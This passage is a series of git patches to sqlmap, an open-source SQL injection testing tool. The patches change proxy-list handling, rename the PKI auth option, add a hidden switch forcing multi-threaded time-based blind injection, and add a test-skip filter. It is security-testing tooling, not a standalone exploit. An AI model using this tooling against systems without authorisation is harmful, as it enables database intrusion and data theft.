0aa86ae32..a653b964b 100644 --- a/plugins/dbms/mssqlserver/enumeration.py +++ b/plugins/dbms/mssqlserver/enumeration.py @@ -152,7 +152,7 @@ class Enumeration(GenericEnumeration): warnMsg += "for database '%s'" % db logger.warn(warnMsg) - if not kb.data.cachedTables: + if not kb.data.cachedTables and not conf.search: errMsg = "unable to retrieve the tables for any database" raise SqlmapNoneDataException(errMsg) else: diff --git a/plugins/generic/databases.py b/plugins/generic/databases.py index dba018808..b9eed29b9 100644 --- a/plugins/generic/databases.py +++ b/plugins/generic/databases.py @@ -358,7 +358,7 @@ class Databases: if bruteForce is None: logger.error(errMsg) return self.getTables(bruteForce=True) - else: + elif not conf.search: raise SqlmapNoneDataException(errMsg) else: for db, tables in kb.data.cachedTables.items(): @@ -432,10 +432,12 @@ class Databases: tblList = tblList[0] tblList = list(tblList) - else: + elif not conf.search: errMsg = "unable to retrieve the tables " errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) raise SqlmapNoneDataException(errMsg) + else: + return kb.data.cachedColumns tblList = filter(None, (safeSQLIdentificatorNaming(_, True) for _ in tblList)) diff --git a/plugins/generic/entries.py b/plugins/generic/entries.py index dcfe3f4f5..8a9a05b18 100644 --- a/plugins/generic/entries.py +++ b/plugins/generic/entries.py @@ -89,10 +89,12 @@ class Entries: if isinstance(tblList[0], (set, tuple, list)): tblList = tblList[0] - else: + elif not conf.search: errMsg = "unable to retrieve the tables " errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) raise SqlmapNoneDataException(errMsg) + else: + return for tbl in tblList: tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True) From d28c72b6f13c669ebe8c179335d52c2fc609fdbb Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 24 Sep 2015 16:26:52 +0200 Subject: [PATCH 44/92] Another fix for Python 2.6 (bug introduced with ff7be9d0eb5baf89a5acc8a4c5325767e3582129) --- lib/utils/api.py | 15 ++++++--------- 1 file changed, 6 insertions(+), 9 deletions(-) diff --git a/lib/utils/api.py b/lib/utils/api.py index d8a38bf1e..07367b15c 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py @@ -376,15 +376,12 @@ def task_list(taskid=None): """ List task pull """ - if is_admin(taskid): - tasks = list(DataStore.tasks) - else: - tasks = [] - for key in DataStore.tasks: - if DataStore.tasks[key].remote_addr == request.remote_addr: - tasks.append(key) - tasks = {x: dejsonize(scan_status(x))['status'] - for x in list(DataStore.tasks)} + tasks = {} + + for key in DataStore.tasks: + if is_admin(taskid) or DataStore.tasks[key].remote_addr == request.remote_addr: + tasks[key] = dejsonize(scan_status(key))["status"] + logger.debug("[%s] Listed task pool (%s)" % (taskid, "admin" if is_admin(taskid) else request.remote_addr)) return jsonize({"success": True, "tasks": tasks, "tasks_num": len(tasks)}) From 4774795d8c60c6e70aad237acd2a330cf74ba9fd Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 25 Sep 2015 14:59:21 +0200 Subject: [PATCH 45/92] Fixes #1429 --- lib/core/common.py | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/lib/core/common.py b/lib/core/common.py index 205f62864..147705db8 100755 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -1623,6 +1623,15 @@ def safeStringFormat(format_, params): index = retVal.find("%s", start) retVal = retVal[:index] + getUnicode(param) + retVal[index + 2:] else: + if any('%s' in _ for _ in conf.parameters.values()): + parts = format_.split(' ') + for i in xrange(len(parts)): + if PAYLOAD_DELIMITER in parts[i]: + parts[i] = parts[i].replace(PAYLOAD_DELIMITER, "") + parts[i] = "%s%s" % (parts[i], PAYLOAD_DELIMITER) + break + format_ = ' '.join(parts) + count = 0 while True: match = re.search(r"(\A|[^A-Za-z0-9])(%s)([^A-Za-z0-9]|\Z)", retVal) From f16389232f8822d82d958b650a2c3e48a8ced985 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 25 Sep 2015 15:23:42 +0200 Subject: [PATCH 46/92] Bug fix for --proxy-file (only first element was fetched in case of fail) --- lib/core/option.py | 35 +++++++++++++++++++++++------------ lib/utils/google.py | 7 +++++-- 2 files changed, 28 insertions(+), 14 deletions(-) diff --git a/lib/core/option.py b/lib/core/option.py index 6eb4433a5..91f2996f9 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -27,6 +27,7 @@ import lib.core.common import lib.core.threads import lib.core.convert import lib.request.connect +import lib.utils.google from lib.controller.checks import checkConnection from lib.core.common import Backend @@ -91,6 +92,7 @@ from lib.core.exception import SqlmapInstallationException from lib.core.exception import SqlmapMissingDependence from lib.core.exception import SqlmapMissingMandatoryOptionException from lib.core.exception import SqlmapMissingPrivileges +from lib.core.exception import SqlmapNoneDataException from lib.core.exception import SqlmapSilentQuitException from lib.core.exception import SqlmapSyntaxException from lib.core.exception import SqlmapSystemException @@ -1084,18 +1086,22 @@ def _setHTTPProxy(): if hasattr(proxyHandler, "%s_open" % _): delattr(proxyHandler, "%s_open" % _) - if not conf.proxy: - if conf.proxyList: - conf.proxy = conf.proxyList[0] - conf.proxyList = conf.proxyList[1:] + conf.proxyList[:1] + if conf.proxyList is not None: + if not conf.proxyList: + errMsg = "list of usable proxies is empty" + raise SqlmapNoneDataException(errMsg) - infoMsg = "loading proxy '%s' from a supplied proxy list file" % conf.proxy - logger.info(infoMsg) - else: - if conf.hostname in ('localhost', '127.0.0.1') or conf.ignoreProxy: - proxyHandler.proxies = {} + conf.proxy = conf.proxyList[0] + conf.proxyList = conf.proxyList[1:] - return + infoMsg = "loading proxy '%s' from a supplied proxy list file" % conf.proxy + logger.info(infoMsg) + + elif not conf.proxy: + if conf.hostname in ("localhost", "127.0.0.1") or conf.ignoreProxy: + proxyHandler.proxies = {} + + return debugMsg = "setting the HTTP/SOCKS proxy for all HTTP requests" logger.debug(debugMsg) @@ -1127,7 +1133,7 @@ def _setHTTPProxy(): if conf.proxyCred: _ = re.search("^(.*?):(.*?)$", conf.proxyCred) if not _: - errMsg = "Proxy authentication credentials " + errMsg = "proxy authentication credentials " errMsg += "value must be in format username:password" raise SqlmapSyntaxException(errMsg) else: @@ -1735,7 +1741,7 @@ def _setConfAttributes(): conf.parameters = {} conf.path = None conf.port = None - conf.proxyList = [] + conf.proxyList = None conf.resultsFilename = None conf.resultsFP = None conf.scheme = None @@ -2413,6 +2419,10 @@ def _basicOptionValidation(): errMsg = "switch '--tor' is incompatible with option '--proxy'" raise SqlmapSyntaxException(errMsg) + if conf.proxy and conf.proxyFile: + errMsg = "switch '--proxy' is incompatible with option '--proxy-file'" + raise SqlmapSyntaxException(errMsg) + if conf.checkTor and not any((conf.tor, conf.proxy)): errMsg = "switch '--check-tor' requires usage of switch '--tor' (or option '--proxy' with HTTP proxy address using Tor)" raise SqlmapSyntaxException(errMsg) @@ -2480,6 +2490,7 @@ def _resolveCrossReferences(): lib.core.common.getPageTemplate = getPageTemplate lib.core.convert.singleTimeWarnMessage = singleTimeWarnMessage lib.request.connect.setHTTPProxy = _setHTTPProxy + lib.utils.google.setHTTPProxy = _setHTTPProxy lib.controller.checks.setVerbosity = setVerbosity def initOptions(inputOptions=AttribDict(), overrideOptions=False): diff --git a/lib/utils/google.py b/lib/utils/google.py index 8ee1ba99c..677fc4c72 100644 --- a/lib/utils/google.py +++ b/lib/utils/google.py @@ -48,7 +48,7 @@ class Google(object): self.opener.addheaders = conf.httpHeaders try: - conn = self.opener.open("http://www.google.com/ncr") + conn = self.opener.open("https://www.google.com/ncr") conn.info() # retrieve session cookie except Exception, ex: errMsg = "unable to connect to Google ('%s')" % getSafeExString(ex) @@ -66,7 +66,7 @@ class Google(object): if not dork: return None - url = "http://www.google.com/search?" + url = "https://www.google.com/search?" url += "q=%s&" % urlencode(dork, convall=True) url += "num=100&hl=en&complete=0&safe=off&filter=0&btnG=Search" url += "&start=%d" % ((gpage - 1) * 100) @@ -176,3 +176,6 @@ class Google(object): retVal = [urllib.unquote(match.group(1)) for match in re.finditer(regex, page, re.I | re.S)] return retVal + +def setHTTPProxy(): # Cross-linked function + raise NotImplementedError From b68891050d4042e9ccf54e5ceeaeee9041f71604 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 25 Sep 2015 23:41:47 +0200 Subject: [PATCH 47/92] Better word used --- lib/core/option.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/core/option.py b/lib/core/option.py index 91f2996f9..99c716032 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -1088,7 +1088,7 @@ def _setHTTPProxy(): if conf.proxyList is not None: if not conf.proxyList: - errMsg = "list of usable proxies is empty" + errMsg = "list of usable proxies is exhausted" raise SqlmapNoneDataException(errMsg) conf.proxy = conf.proxyList[0] From 38541b021a06b88b8af761d2310e5976272db366 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 26 Sep 2015 00:09:17 +0200 Subject: [PATCH 48/92] Implementing hidden switch '--force-threads' on request (to force multi-threading in time-based SQLi) --- lib/parse/cmdline.py | 3 +++ lib/request/inject.py | 2 +- lib/techniques/blind/inference.py | 7 ++++--- 3 files changed, 8 insertions(+), 4 deletions(-) diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index 6d417fc21..4eebceb2c 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -763,6 +763,9 @@ def cmdLineParser(argv=None): parser.add_option("--force-dns", dest="forceDns", action="store_true", help=SUPPRESS_HELP) + parser.add_option("--force-threads", dest="forceThreads", action="store_true", + help=SUPPRESS_HELP) + parser.add_option("--smoke-test", dest="smokeTest", action="store_true", help=SUPPRESS_HELP) diff --git a/lib/request/inject.py b/lib/request/inject.py index b12517ce4..13b8984d4 100644 --- a/lib/request/inject.py +++ b/lib/request/inject.py @@ -78,7 +78,7 @@ def _goInference(payload, expression, charsetType=None, firstChar=None, lastChar timeBasedCompare = (kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) if not (timeBasedCompare and kb.dnsTest): - if (conf.eta or conf.threads > 1) and Backend.getIdentifiedDbms() and not re.search("(COUNT|LTRIM)\(", expression, re.I) and not timeBasedCompare: + if (conf.eta or conf.threads > 1) and Backend.getIdentifiedDbms() and not re.search("(COUNT|LTRIM)\(", expression, re.I) and not (timeBasedCompare and not conf.forceThreads): if field and re.search("\ASELECT\s+DISTINCT\((.+?)\)\s+FROM", expression, re.I): expression = "SELECT %s FROM (%s)" % (field, expression) diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py index e61b65154..3a6a0cdb7 100644 --- a/lib/techniques/blind/inference.py +++ b/lib/techniques/blind/inference.py @@ -146,12 +146,12 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None if showEta: progress = ProgressBar(maxValue=length) - if timeBasedCompare and conf.threads > 1: + if timeBasedCompare and conf.threads > 1 and not conf.forceThreads: warnMsg = "multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically" singleTimeWarnMessage(warnMsg) if numThreads > 1: - if not timeBasedCompare: + if not timeBasedCompare or conf.forceThreads: debugMsg = "starting %d thread%s" % (numThreads, ("s" if numThreads > 1 else "")) logger.debug(debugMsg) else: @@ -597,8 +597,9 @@ def queryOutputLength(expression, payload): infoMsg = "retrieving the length of query output" logger.info(infoMsg) - lengthExprUnescaped = agent.forgeQueryOutputLength(expression) start = time.time() + + lengthExprUnescaped = agent.forgeQueryOutputLength(expression) count, length = bisection(payload, lengthExprUnescaped, charsetType=CHARSET_TYPE.DIGITS) debugMsg = "performed %d queries in %.2f seconds" % (count, calculateDeltaSeconds(start)) From 5ed106eceaef995b0b080ce50a09b0b48eb27856 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 27 Sep 2015 15:59:17 +0200 Subject: [PATCH 49/92] Patch for an Issue #1434 --- lib/core/dicts.py | 1 + lib/core/option.py | 10 +++++----- lib/core/optiondict.py | 2 +- lib/parse/cmdline.py | 4 ++-- lib/request/pkihandler.py | 7 ++++--- sqlmap.conf | 4 ++-- 6 files changed, 15 insertions(+), 13 deletions(-) diff --git a/lib/core/dicts.py b/lib/core/dicts.py index b6a0ea2ba..47e316e87 100644 --- a/lib/core/dicts.py +++ b/lib/core/dicts.py @@ -223,6 +223,7 @@ DEPRECATED_OPTIONS = { "--replicate": "use '--dump-format=SQLITE' instead", "--no-unescape": "use '--no-escape' instead", "--binary": "use '--binary-fields' instead", + "--auth-private": "use '--auth-file' instead", "--check-payload": None, "--check-waf": None, } diff --git a/lib/core/option.py b/lib/core/option.py index 99c716032..d73b512bc 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -1264,13 +1264,13 @@ def _setHTTPAuthentication(): global authHandler - if not conf.authType and not conf.authCred and not conf.authPrivate: + if not conf.authType and not conf.authCred and not conf.authFile: return - if conf.authPrivate and not conf.authType: + if conf.authFile and not conf.authType: conf.authType = AUTH_TYPE.PKI - elif conf.authType and not conf.authCred and not conf.authPrivate: + elif conf.authType and not conf.authCred and not conf.authFile: errMsg = "you specified the HTTP authentication type, but " errMsg += "did not provide the credentials" raise SqlmapSyntaxException(errMsg) @@ -1285,7 +1285,7 @@ def _setHTTPAuthentication(): errMsg += "Basic, Digest, NTLM or PKI" raise SqlmapSyntaxException(errMsg) - if not conf.authPrivate: + if not conf.authFile: debugMsg = "setting the HTTP authentication type and credentials" logger.debug(debugMsg) @@ -1336,7 +1336,7 @@ def _setHTTPAuthentication(): debugMsg = "setting the HTTP(s) authentication PEM private key" logger.debug(debugMsg) - _ = safeExpandUser(conf.authPrivate) + _ = safeExpandUser(conf.authFile) checkFile(_) authHandler = HTTPSPKIAuthHandler(_) diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py index 3ff1ded01..257f86eb0 100644 --- a/lib/core/optiondict.py +++ b/lib/core/optiondict.py @@ -37,7 +37,7 @@ optDict = { "headers": "string", "authType": "string", "authCred": "string", - "authPrivate": "string", + "authFile": "string", "proxy": "string", "proxyCred": "string", "proxyFile": "string", diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index 4eebceb2c..b801bab95 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -144,8 +144,8 @@ def cmdLineParser(argv=None): help="HTTP authentication credentials " "(name:password)") - request.add_option("--auth-private", dest="authPrivate", - help="HTTP authentication PEM private key file") + request.add_option("--auth-file", dest="authFile", + help="HTTP authentication PEM cert/private key file") request.add_option("--ignore-401", dest="ignore401", action="store_true", help="Ignore HTTP Error 401 (Unauthorized)") diff --git a/lib/request/pkihandler.py b/lib/request/pkihandler.py index ea3aa7aad..2f0c31dba 100644 --- a/lib/request/pkihandler.py +++ b/lib/request/pkihandler.py @@ -11,12 +11,13 @@ import urllib2 from lib.core.data import conf class HTTPSPKIAuthHandler(urllib2.HTTPSHandler): - def __init__(self, key_file): + def __init__(self, auth_file): urllib2.HTTPSHandler.__init__(self) - self.key_file = key_file + self.auth_file = auth_file def https_open(self, req): return self.do_open(self.getConnection, req) def getConnection(self, host, timeout=None): - return httplib.HTTPSConnection(host, key_file=self.key_file, timeout=conf.timeout) + # Reference: https://docs.python.org/2/library/ssl.html#ssl.SSLContext.load_cert_chain + return httplib.HTTPSConnection(host, cert_file=self.auth_file, key_file=self.auth_file, timeout=conf.timeout) diff --git a/sqlmap.conf b/sqlmap.conf index c18159375..2bcd15f1d 100644 --- a/sqlmap.conf +++ b/sqlmap.conf @@ -93,10 +93,10 @@ authType = # Syntax: username:password authCred = -# HTTP Authentication PEM private key. Useful only if the target URL requires +# HTTP Authentication PEM private/cert key file. Useful only if the target URL requires # PKI authentication and you have such data. # Syntax: key_file -authPrivate = +authFile = # Use a proxy to connect to the target URL. # Syntax: (http|https|socks4|socks5)://address:port From 5bade7947b25251d7eb03b7a51a8ae66f1c67e3f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 27 Sep 2015 16:09:02 +0200 Subject: [PATCH 50/92] Fixes #1435 --- lib/utils/google.py | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/lib/utils/google.py b/lib/utils/google.py index 677fc4c72..0fec576e6 100644 --- a/lib/utils/google.py +++ b/lib/utils/google.py @@ -31,6 +31,8 @@ from lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE from lib.core.settings import UNICODE_ENCODING from lib.request.basic import decodePage from lib.request.httpshandler import HTTPSHandler +from thirdparty.socks import socks + class Google(object): """ @@ -100,7 +102,7 @@ class Google(object): warnMsg += "to get error page information (%d)" % e.code logger.critical(warnMsg) return None - except (urllib2.URLError, httplib.error, socket.error, socket.timeout): + except (urllib2.URLError, httplib.error, socket.error, socket.timeout, socks.ProxyError): errMsg = "unable to connect to Google" raise SqlmapConnectionException(errMsg) From ef22f31fdf9174bc33c6bf99c8ebe2ab8f960618 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 27 Sep 2015 16:17:58 +0200 Subject: [PATCH 51/92] Fixes #1433 --- lib/request/connect.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/request/connect.py b/lib/request/connect.py index a49bba0a3..537a1cb64 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -144,6 +144,7 @@ class Connect(object): warnMsg += "(e.g. '--flush-session --technique=BEUS') or try to " warnMsg += "lower the value of option '--time-sec' (e.g. '--time-sec=2')" singleTimeWarnMessage(warnMsg) + elif kb.originalPage is None: if conf.tor: warnMsg = "please make sure that you have " @@ -160,13 +161,12 @@ class Connect(object): warnMsg += "with the switch '--random-agent' turned on " warnMsg += "and/or proxy switches ('--ignore-proxy', '--proxy',...)" singleTimeWarnMessage(warnMsg) + elif conf.threads > 1: warnMsg = "if the problem persists please try to lower " warnMsg += "the number of used threads (option '--threads')" singleTimeWarnMessage(warnMsg) - time.sleep(1) - kwargs['retrying'] = True return Connect._getPageProxy(**kwargs) From 1fd6b007ab0d3fd347c4d1f4642565ff892dcd2a Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 27 Sep 2015 16:36:20 +0200 Subject: [PATCH 52/92] Less critical messages when something goes wrong with connection --- lib/request/connect.py | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/lib/request/connect.py b/lib/request/connect.py index 537a1cb64..b0d645264 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -621,7 +621,11 @@ class Connect(object): return None, None, None elif threadData.retriesCount < conf.retries and not kb.threadException: warnMsg += ". sqlmap is going to retry the request" - logger.critical(warnMsg) + if not retrying: + warnMsg += "(s)" + logger.critical(warnMsg) + else: + logger.debug(warnMsg) return Connect._retryProxy(**kwargs) elif kb.testMode: logger.critical(warnMsg) From ac467bc4538627f49eeb38e05513688fc7d143b2 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 28 Sep 2015 09:54:41 +0200 Subject: [PATCH 53/92] Fixes #1437 --- lib/techniques/blind/inference.py | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py index 3a6a0cdb7..11e78ed6c 100644 --- a/lib/techniques/blind/inference.py +++ b/lib/techniques/blind/inference.py @@ -232,8 +232,10 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None # Used for gradual expanding into unicode charspace shiftTable = [2, 2, 3, 3, 5, 4] - if CHAR_INFERENCE_MARK in payload and ord('\n') in charTbl: - charTbl.remove(ord('\n')) + if "'%s'" % CHAR_INFERENCE_MARK in payload: + for char in ('\n', '\r'): + if ord(char) in charTbl: + charTbl.remove(ord(char)) if not charTbl: return None From 906cb6d3c2388e21c76b03a74de9cab88b75f4b4 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 28 Sep 2015 11:11:39 +0200 Subject: [PATCH 54/92] Removing a hard limit to use --start/--stop only for --dump scenarios --- lib/core/common.py | 11 +++++------ plugins/generic/entries.py | 2 +- 2 files changed, 6 insertions(+), 7 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 147705db8..c52441c70 100755 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -1370,7 +1370,7 @@ def expandAsteriskForColumns(expression): return expression -def getLimitRange(count, dump=False, plusOne=False): +def getLimitRange(count, plusOne=False): """ Returns range of values used in limit/offset constructs @@ -1382,12 +1382,11 @@ def getLimitRange(count, dump=False, plusOne=False): count = int(count) limitStart, limitStop = 1, count - if dump: - if isinstance(conf.limitStop, int) and conf.limitStop > 0 and conf.limitStop < limitStop: - limitStop = conf.limitStop + if isinstance(conf.limitStop, int) and conf.limitStop > 0 and conf.limitStop < limitStop: + limitStop = conf.limitStop - if isinstance(conf.limitStart, int) and conf.limitStart > 0 and conf.limitStart <= limitStop: - limitStart = conf.limitStart + if isinstance(conf.limitStart, int) and conf.limitStart > 0 and conf.limitStart <= limitStop: + limitStart = conf.limitStart retVal = xrange(limitStart, limitStop + 1) if plusOne else xrange(limitStart - 1, limitStop) diff --git a/plugins/generic/entries.py b/plugins/generic/entries.py index 8a9a05b18..6dc5fe8c4 100644 --- a/plugins/generic/entries.py +++ b/plugins/generic/entries.py @@ -275,7 +275,7 @@ class Entries: else: emptyColumns = [] plusOne = Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2) - indexRange = getLimitRange(count, dump=True, plusOne=plusOne) + indexRange = getLimitRange(count, plusOne=plusOne) if len(colList) < len(indexRange) > CHECK_ZERO_COLUMNS_THRESHOLD: for column in colList: From 5ce4d4d2ec1877a77ca7defe2249e8c95d64d032 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 29 Sep 2015 10:10:39 +0200 Subject: [PATCH 55/92] Fixes #1439 --- lib/utils/hash.py | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/lib/utils/hash.py b/lib/utils/hash.py index e0a0a0c50..c4a3739c9 100644 --- a/lib/utils/hash.py +++ b/lib/utils/hash.py @@ -327,8 +327,10 @@ def wordpress_passwd(password, salt, count, prefix, uppercase=False): return output + password = password.encode(UNICODE_ENCODING) + cipher = md5(salt) - cipher.update(password.encode(UNICODE_ENCODING)) + cipher.update(password) hash_ = cipher.digest() for i in xrange(count): From a1a7161fabe49cc884e67af70e2e32d7ed3f0509 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 30 Sep 2015 10:13:19 +0200 Subject: [PATCH 56/92] Fixes #1441 --- lib/request/comparison.py | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/lib/request/comparison.py b/lib/request/comparison.py index b3d76ea27..7028b364f 100644 --- a/lib/request/comparison.py +++ b/lib/request/comparison.py @@ -128,9 +128,16 @@ def _comparison(page, headers, code, getRatioValue, pageLength): count += 1 else: break + if count: - seq1 = seq1[count:] - seq2 = seq2[count:] + try: + _seq1 = seq1[count:] + _seq2 = seq2[count:] + except MemoryError: + pass + else: + seq1 = _seq1 + seq2 = _seq2 while True: try: From 29edb4f75cab29d9d81f2ddff9546cd7f531627a Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 30 Sep 2015 11:26:56 +0200 Subject: [PATCH 57/92] Fixes #1440 --- lib/core/common.py | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/lib/core/common.py b/lib/core/common.py index c52441c70..6ff973a58 100755 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -2809,7 +2809,13 @@ def unArrayizeValue(value): """ if isListLike(value): - value = value[0] if len(value) > 0 else None + if not value: + value = None + elif len(value) == 1 and not isListLike(value[0]): + value = value[0] + else: + _ = filter(lambda _: _ is not None, (_ for _ in flattenValue(value))) + value = _[0] if len(_) > 0 else None return value From 53de0e8949ca10a7b4649503bf1ffe4fd92ec916 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 1 Oct 2015 11:57:33 +0200 Subject: [PATCH 58/92] Implements #1442 --- lib/controller/checks.py | 10 ++++++++++ lib/core/option.py | 4 ++++ lib/core/optiondict.py | 1 + lib/parse/cmdline.py | 3 +++ sqlmap.conf | 3 +++ 5 files changed, 21 insertions(+) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index eac95629e..e03b8909d 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -207,6 +207,16 @@ def checkSqlInjection(place, parameter, value): logger.debug(debugMsg) continue + # Skip tests if title, vector or DBMS is included by the + # given skip filter + if conf.testSkip and any(conf.testSkip in str(item) or \ + re.search(conf.testSkip, str(item), re.I) for item in \ + (test.title, test.vector, payloadDbms)): + debugMsg = "skipping test '%s' because its " % title + debugMsg += "name/vector/DBMS is included by the given skip filter" + logger.debug(debugMsg) + continue + if payloadDbms is not None: # Skip DBMS-specific test if it does not match the user's # provided DBMS diff --git a/lib/core/option.py b/lib/core/option.py index d73b512bc..f51e5210c 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -1634,6 +1634,10 @@ def _cleanupOptions(): conf.testFilter = conf.testFilter.strip('*+') conf.testFilter = re.sub(r"([^.])([*+])", "\g<1>.\g<2>", conf.testFilter) + if conf.testSkip: + conf.testSkip = conf.testSkip.strip('*+') + conf.testSkip = re.sub(r"([^.])([*+])", "\g<1>.\g<2>", conf.testSkip) + if "timeSec" not in kb.explicitSettings: if conf.tor: conf.timeSec = 2 * conf.timeSec diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py index 257f86eb0..9eb0d121a 100644 --- a/lib/core/optiondict.py +++ b/lib/core/optiondict.py @@ -205,6 +205,7 @@ optDict = { "saveConfig": "string", "scope": "string", "testFilter": "string", + "testSkip": "string", "updateAll": "boolean", }, diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index b801bab95..03bb1ac80 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -674,6 +674,9 @@ def cmdLineParser(argv=None): general.add_option("--test-filter", dest="testFilter", help="Select tests by payloads and/or titles (e.g. ROW)") + general.add_option("--test-skip", dest="testSkip", + help="Skip tests by payloads and/or titles (e.g. BENCHMARK)") + general.add_option("--update", dest="updateAll", action="store_true", help="Update sqlmap") diff --git a/sqlmap.conf b/sqlmap.conf index 2bcd15f1d..fb0e00185 100644 --- a/sqlmap.conf +++ b/sqlmap.conf @@ -708,6 +708,9 @@ scope = # Select tests by payloads and/or titles (e.g. ROW) testFilter = +# Skip tests by payloads and/or titles (e.g. BENCHMARK) +testSkip = + # Update sqlmap. # Valid: True or False updateAll = False From acd6b7797f44ac6339508b46522a5545a62c7b4d Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 5 Oct 2015 15:18:54 +0200 Subject: [PATCH 59/92] Fixes #1446 --- lib/core/common.py | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 6ff973a58..6bbe947e4 100755 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -1875,8 +1875,13 @@ def readCachedFileContent(filename, mode='rb'): with kb.locks.cache: if filename not in kb.cache.content: checkFile(filename) - with openFile(filename, mode) as f: - kb.cache.content[filename] = f.read() + try: + with openFile(filename, mode) as f: + kb.cache.content[filename] = f.read() + except (IOError, OSError, MemoryError), ex: + errMsg = "something went wrong while trying " + errMsg += "to read the content of file '%s' ('%s')" % (filename, ex) + raise SqlmapSystemException(errMsg) return kb.cache.content[filename] From 1c6e288eb1e169e174cf7346a3e9e0f92e7e4e49 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 5 Oct 2015 15:33:29 +0200 Subject: [PATCH 60/92] Fixes #1447 --- lib/core/common.py | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/lib/core/common.py b/lib/core/common.py index 6bbe947e4..3740365de 100755 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -2503,7 +2503,10 @@ def extractTextTagContent(page): page = page or "" if REFLECTED_VALUE_MARKER in page: - page = re.sub(r"(?si)[^\s>]*%s[^\s<]*" % REFLECTED_VALUE_MARKER, "", page) + try: + page = re.sub(r"(?i)[^\s>]*%s[^\s<]*" % REFLECTED_VALUE_MARKER, "", page) + except MemoryError: + page = page.replace(REFLECTED_VALUE_MARKER, "") return filter(None, (_.group('result').strip() for _ in re.finditer(TEXT_TAG_REGEX, page))) From 20c19f33dc9e77b327657451d6d459b0ad575a4b Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 5 Oct 2015 15:51:21 +0200 Subject: [PATCH 61/92] Minor update --- lib/core/common.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/core/common.py b/lib/core/common.py index 3740365de..ba923fd31 100755 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -3043,7 +3043,7 @@ def maskSensitiveData(msg): retVal = getUnicode(msg) - for item in filter(None, map(lambda x: conf.get(x), ("hostname", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy", "rFile", "wFile", "dFile"))): + for item in filter(None, map(lambda x: conf.get(x), ("hostname", "data", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy", "rFile", "wFile", "dFile"))): regex = SENSITIVE_DATA_REGEX % re.sub("(\W)", r"\\\1", getUnicode(item)) while extractRegexResult(regex, retVal): value = extractRegexResult(regex, retVal) From 1258b354c3b999f3d0dae6f731352910ad7b7112 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 5 Oct 2015 16:09:58 +0200 Subject: [PATCH 62/92] Minor refactoring --- lib/utils/hash.py | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/lib/utils/hash.py b/lib/utils/hash.py index 